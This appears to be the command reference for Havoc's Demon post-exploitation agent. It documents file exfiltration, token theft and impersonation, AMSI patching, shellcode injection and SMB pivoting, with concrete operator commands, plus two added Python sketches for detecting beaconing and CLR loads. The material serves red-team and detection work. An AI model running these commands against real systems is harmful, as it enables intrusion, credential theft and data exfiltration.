Command Overview

Demon implements a comprehensive command set organized by functionality. All commands are dispatched through a central command dispatcher and executed based on the command ID.
Type help in the Demon interact window to see all available commands. Use help [command] for detailed information about a specific command.

Session Management

checkin

Request a full checkin from the Demon agent.
checkin
Output includes:
  • Magic values for verification
  • First and last call timestamps
  • AES encryption key and IV
  • Current sleep delay and jitter
  • Request ID tracking
  • Computer hostname
  • Current username and domain
  • Internal IP addresses
  • Network adapter information
  • Process name and path
  • Process architecture (x86/x64)
  • Process ID (PID)
  • Parent Process ID (PPID)
  • Elevated/Integrity level
  • Windows version
  • Build number
  • OS architecture

sleep

Modify the agent’s sleep interval and jitter.
sleep [seconds] [jitter_percent]
Examples:
sleep 5        # Sleep 5 seconds with existing jitter
sleep 10 20    # Sleep 10 seconds with 20% jitter
sleep 0        # Interactive mode (no sleep)
Behavior:
  • With jitter, actual sleep time varies: sleep ± (sleep * jitter / 100)
  • Sleep of 0 enables interactive mode for real-time operations
  • Sleep obfuscation only occurs when sleep > 0 and no jobs are running
Working hours and kill date restrictions still apply even with modified sleep values.
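For defenders, the jitter formula above bounds every callback interval to a fixed band around the sleep value, which can be recovered from proxy or flow logs. The following is an added detection sketch, not code from the Havoc project; the function names, thresholds and sample timestamps are assumptions constructed for illustration.

```python
from itertools import accumulate
from statistics import median

def estimate_beacon(timestamps, gap_factor=5.0, min_intervals=6, max_jitter=50.0):
    """Return (sleep_seconds, jitter_percent) if the callbacks look periodic, else None.

    Model taken from the formula above: each interval lies in
    sleep ± (sleep * jitter / 100). The three thresholds are assumed defaults.
    """
    ts = sorted(timestamps)
    deltas = [b - a for a, b in zip(ts, ts[1:])]
    if len(deltas) < min_intervals:
        return None
    typical = median(deltas)
    if typical <= 0:
        return None  # burst traffic or sleep 0: no interval to measure
    # Long pauses (working hours, host powered off) are not part of the jitter band.
    kept = [d for d in deltas if d <= gap_factor * typical]
    if len(kept) < min_intervals:
        return None
    lo, hi = min(kept), max(kept)
    sleep = (lo + hi) / 2                  # centre of the band
    jitter = (hi - lo) / (hi + lo) * 100   # half-width as a percentage of sleep
    if jitter > max_jitter:
        return None  # spread too wide to call periodic
    return round(sleep, 1), round(jitter, 1)

def to_times(intervals, start=1_700_000_000):
    """Turn a list of gaps in seconds into absolute epoch timestamps."""
    return list(accumulate(intervals, initial=start))

# Constructed sample: 10 s sleep with 20% jitter and one overnight pause.
BEACON = to_times([8, 12, 10, 9, 11, 10, 3600, 12, 8, 10])
# Constructed sample: irregular, user-driven requests to the same destination.
HUMAN = to_times([1, 45, 3, 300, 7, 120, 2, 60])

if __name__ == "__main__":
    print("beacon:", estimate_beacon(BEACON))
    print("human: ", estimate_beacon(HUMAN))
```

Run it per source and destination pair; the recovered sleep and jitter values are estimates and tighten as more intervals are observed.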

exit

Terminate the Demon agent.
exit
This command causes the agent to terminate immediately. There is no recovery once executed.
Cleanup actions:
  • Closes all handles
  • Frees allocated memory
  • Terminates all job threads
  • Exits process cleanly

Process Management

proc list

Enumerate running processes on the target system.
proc list
Output columns:
  • Process Name
  • PID (Process ID)
  • PPID (Parent Process ID)
  • Architecture (x86/x64)
  • Username (if accessible)
  • Session ID
Implementation: Uses CreateToolhelp32Snapshot and Process32FirstW/Process32NextW

proc kill

Terminate a process by PID.
proc kill [pid]
Example:
proc kill 1234
Method: Opens process with PROCESS_TERMINATE access and calls NtTerminateProcess (via syscall if configured).

proc create

Spawn a new process in suspended or running state.
proc create [state] [path] [args]
States:
  • suspended - Process created in suspended state
  • normal - Process starts immediately
Examples:
proc create normal C:\Windows\System32\cmd.exe /c whoami
proc create suspended C:\Windows\System32\notepad.exe
Use cases:
  • Suspended: For process injection targets
  • Normal: Execute commands and capture output

proc module

List loaded modules in a target process.
proc module [pid]
Output:
  • Module name
  • Base address
  • Module size
  • Full path
Use case: Identify loaded DLLs for injection or hijacking opportunities

proc grep

Search for processes by name.
proc grep [process_name]
Example:
proc grep chrome
Output: All processes matching the search term with full details

proc memory

Query memory regions in a target process.
proc memory [pid] [protection]
Protection values:
  • PAGE_EXECUTE_READ (0x20)
  • PAGE_EXECUTE_READWRITE (0x40)
  • PAGE_READWRITE (0x04)
Example:
proc memory 1234 0x40  # Find RWX regions
Output: Base address, size, and protection of matching memory regions

File System Operations

fs dir

List directory contents.
fs dir [path]
Example:
fs dir C:\Users\Public
Output:
  • File/Directory name
  • Size
  • Last modified time
  • Attributes (Hidden, System, Archive, etc.)

fs cd

Change current working directory.
fs cd [path]
Example:
fs cd C:\Windows\Temp

fs pwd

Print current working directory.
fs pwd

fs download

Download a file from the target to the teamserver.
fs download [remote_path]
Features:
  • Chunked transfer (configurable chunk size)
  • Progress tracking
  • Automatic resumption on failure
Example:
fs download C:\Users\Admin\Documents\secrets.txt
Large files are automatically split into chunks. Check download progress with the transfer command.

fs upload

Upload a file from the teamserver to the target.
fs upload [local_path] [remote_path]
Example:
fs upload /tmp/tool.exe C:\Windows\Temp\tool.exe

fs cat

Read and display file contents.
fs cat [path]
Example:
fs cat C:\Windows\System32\drivers\etc\hosts
Large files will be truncated in output. Use fs download for large files.

fs remove

Delete a file.
fs remove [path]
Example:
fs remove C:\Windows\Temp\artifact.exe

fs mkdir

Create a directory.
fs mkdir [path]

fs copy

Copy a file or directory.
fs copy [source] [destination]

fs move

Move or rename a file.
fs move [source] [destination]

Token Management

token getuid

Display current user context.
token getuid
Output:
  • Username
  • Domain
  • SID
  • Integrity level
  • Token type

token list

List all tokens in the token vault.
token list
Output for each token:
  • Token ID (for impersonation)
  • Username
  • Domain
  • Token type (Primary/Impersonation)
  • Session ID

token find-tokens

Scan the system for accessible tokens.
token find-tokens
Process:
  1. Enumerate all running processes
  2. Attempt to open process token
  3. Query token information
  4. Display accessible tokens
Use case: Identify privilege escalation opportunities

token steal

Steal a token from a process and add it to the vault.
token steal [pid] [handle_optional]
Examples:
token steal 1234              # Steal process token
token steal 1234 0x100        # Steal specific handle
Process:
  1. Open target process
  2. Open process token or duplicate specified handle
  3. Duplicate token with SecurityIdentification and SecurityImpersonation
  4. Store in token vault
  5. Return token ID

token impersonate

Apply a token from the vault to the current thread.
token impersonate [id]
Example:
token impersonate 3  # Use token ID from 'token list'
Effect: All subsequent operations execute under the impersonated user context
Impersonation affects the current thread. Use token revert to return to the original token.

token revert

Revert to the default process token.
token revert
Implementation: Calls RevertToSelf() to remove thread impersonation

token remove

Remove a token from the vault.
token remove [id]

token clear

Remove all tokens from the vault.
token clear

token make

Create a token from credentials.
token make [domain] [username] [password]
Example:
token make CORP john.doe Password123!
Methods:
  • LogonUserW with LOGON32_LOGON_NETWORK (Type 3)
  • Token added to vault automatically

token privs-get

Attempt to enable all privileges on the current token.
token privs-get
Common privileges enabled:
  • SeDebugPrivilege
  • SeImpersonatePrivilege
  • SeLoadDriverPrivilege
  • SeTcbPrivilege
  • SeBackupPrivilege
  • SeRestorePrivilege

token privs-list

List all privileges and their states.
token privs-list
Output:
  • Privilege name
  • State (Enabled/Disabled)
  • Attributes

Code Execution

inline-execute

Execute a Beacon Object File (BOF) in-memory.
inline-execute [path_to_bof] [args]
Example:
inline-execute /root/bofs/whoami.o
Features:
  • COFF parsing and linking
  • Beacon API compatibility
  • Output capture
  • Optional VEH crash protection
  • Thread-based execution (if configured)
Inline Mode (CoffeeThreaded: false)
  • Executes in current thread
  • Fastest performance
  • No job management
  • Crash will terminate agent
Threaded Mode (CoffeeThreaded: true)
  • Executes in separate thread
  • Manageable via job commands
  • Isolated from main agent
  • VEH can catch crashes

dotnet inline-execute

Execute a .NET assembly in-memory.
dotnet inline-execute [path_to_assembly] [args]
Example:
dotnet inline-execute /root/Seatbelt.exe -group=all
Process:
  1. Initialize CLR (if not already loaded)
  2. Patch AMSI in amsi.dll
  3. Create AppDomain
  4. Load assembly from memory
  5. Invoke entry point with arguments
  6. Capture console output
OPSEC: Loading the CLR is irreversible and increases process footprint. The CLR remains loaded for the lifetime of the process.
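Because the CLR stays loaded for the life of the process, a runtime module load inside a process that is not normally a .NET host is a durable detection point. The following is an added example, not code from the Havoc project: it filters Sysmon Event ID 7 (image load) records, and the allowlist, helper names and sample events are assumptions constructed for illustration.

```python
import ntpath

CLR_MODULES = {"clr.dll", "clrjit.dll", "mscorwks.dll"}  # .NET 4 runtime, JIT, .NET 2 runtime
EXPECTED_HOSTS = {"powershell.exe", "msbuild.exe"}       # assumed allowlist, tune per site

def unexpected_clr_loads(events, expected_hosts=EXPECTED_HOSTS):
    """Map ProcessGuid -> finding for processes outside the allowlist that loaded the CLR."""
    findings = {}
    for ev in events:
        if ev.get("EventID") != 7:        # Sysmon image-load events only
            continue
        module = ntpath.basename(ev["ImageLoaded"]).lower()
        host = ntpath.basename(ev["Image"]).lower()
        if module not in CLR_MODULES or host in expected_hosts:
            continue
        # One finding per process: the runtime stays loaded until the process exits.
        f = findings.setdefault(ev["ProcessGuid"], {
            "image": ev["Image"], "pid": ev["ProcessId"],
            "first_seen": ev["UtcTime"], "modules": []})
        if module not in f["modules"]:
            f["modules"].append(module)
    return findings

def load_event(time, guid, pid, image, loaded):
    """Build one constructed Sysmon Event ID 7 record."""
    return {"EventID": 7, "UtcTime": time, "ProcessGuid": guid,
            "ProcessId": pid, "Image": image, "ImageLoaded": loaded}

NET4 = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319"
NOTEPAD = r"C:\Windows\System32\notepad.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed events, not taken from a real host.
EVENTS = [
    load_event("10:00:01", "{guid-a}", 4120, NOTEPAD, NET4 + r"\clr.dll"),
    load_event("10:00:01", "{guid-a}", 4120, NOTEPAD, NET4 + r"\clrjit.dll"),
    load_event("10:00:05", "{guid-b}", 5332, POWERSHELL, NET4 + r"\clr.dll"),
    load_event("10:00:09", "{guid-a}", 4120, NOTEPAD, r"C:\Windows\System32\amsi.dll"),
]

if __name__ == "__main__":
    for guid, finding in unexpected_clr_loads(EVENTS).items():
        print(guid, finding)
```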

dotnet list-versions

List installed .NET Framework versions.
dotnet list-versions
Output: All installed .NET versions detected in the registry

shellcode inject

Inject shellcode into a remote process.
shellcode inject [arch] [pid] [path_to_shellcode]
Example:
shellcode inject x64 1234 /tmp/payload.bin
See Injection Techniques for detailed documentation.

shellcode spawn

Spawn a sacrificial process and inject shellcode (fork & run).
shellcode spawn [arch] [path_to_shellcode]
Example:
shellcode spawn x64 /tmp/payload.bin
Process:
  1. Spawn configured process in suspended state
  2. Allocate memory in target
  3. Write shellcode
  4. Create remote thread
  5. Resume process

Network Commands

net domain

Query domain information.
net domain
Output:
  • Domain name
  • Domain controller
  • Forest information

net dclist

Enumerate domain controllers.
net dclist [domain]

net logons

Enumerate logged-on users.
net logons [computer]
API: NetWkstaUserEnum

net sessions

Enumerate active sessions on a computer.
net sessions [computer]
API: NetSessionEnum

net localgroup

Enumerate local groups.
net localgroup [computer]
API: NetLocalGroupEnum

net group

Enumerate domain groups.
net group [domain]

net user

Enumerate users.
net user [domain]

net share

Enumerate shares on a computer.
net share [computer]
API: NetShareEnum

Job Management

job list

List all running jobs.
job list
Output:
  • Job ID
  • Job type (BOF, Download, etc.)
  • State (Running, Suspended)
  • Thread ID

job suspend

Suspend a running job.
job suspend [id]
Example:
job suspend 1
Implementation: Calls NtSuspendThread on the job’s thread

job resume

Resume a suspended job.
job resume [id]
Implementation: Calls NtResumeThread

job kill

Terminate and remove a job.
job kill [id]
Process:
  1. Suspend thread
  2. Terminate thread
  3. Free allocated resources
  4. Remove from job list
Sleep obfuscation is disabled while jobs are running. Kill or suspend jobs to enable sleep obfuscation.

Transfer Management

transfer list

List active file transfers.
transfer list
Output:
  • Transfer ID
  • Filename
  • Size
  • Progress
  • State

transfer stop

Pause a file transfer.
transfer stop [id]

transfer resume

Resume a paused transfer.
transfer resume [id]

transfer remove

Cancel and remove a transfer.
transfer remove [id]

Miscellaneous Commands

screenshot

Capture a screenshot of the desktop.
screenshot
Process:
  1. Get desktop device context
  2. Create compatible DC
  3. BitBlt to copy screen
  4. Convert to BMP format
  5. Send to teamserver
Requirements: GUI session (does not work in services or non-interactive sessions)

config

View or modify agent configuration.
config                                      # Show all settings
config sleep [seconds] [jitter]             # Modify sleep
config injection technique [value]          # Set injection technique
config injection spawn64 [path]             # Set x64 spawn process
config injection spawn32 [path]             # Set x86 spawn process
config memory alloc [value]                 # Set allocation method
config memory execute [value]               # Set execution method
config killdate [YYYY-MM-DD HH:MM:SS]       # Set kill date
config workinghours [HH:MM-HH:MM]           # Set working hours
Values:
  • injection technique: 1 (Win32), 2 (Syscall), 3 (APC)
  • memory alloc/execute: 1 (Win32), 2 (Syscall)

pivot

Manage SMB pivot connections.
pivot list                          # List pivots
pivot smb-connect [hostname] [pipe] # Connect to SMB pivot
pivot smb-disconnect [id]           # Disconnect pivot
Use case: Create lateral movement paths through compromised hosts

kerberos

Kerberos ticket operations.
kerberos list           # List cached tickets
kerberos tgt [options]  # Request TGT
kerberos tgs [options]  # Request TGS
Kerberos functionality requires appropriate privileges and network access to domain controllers.
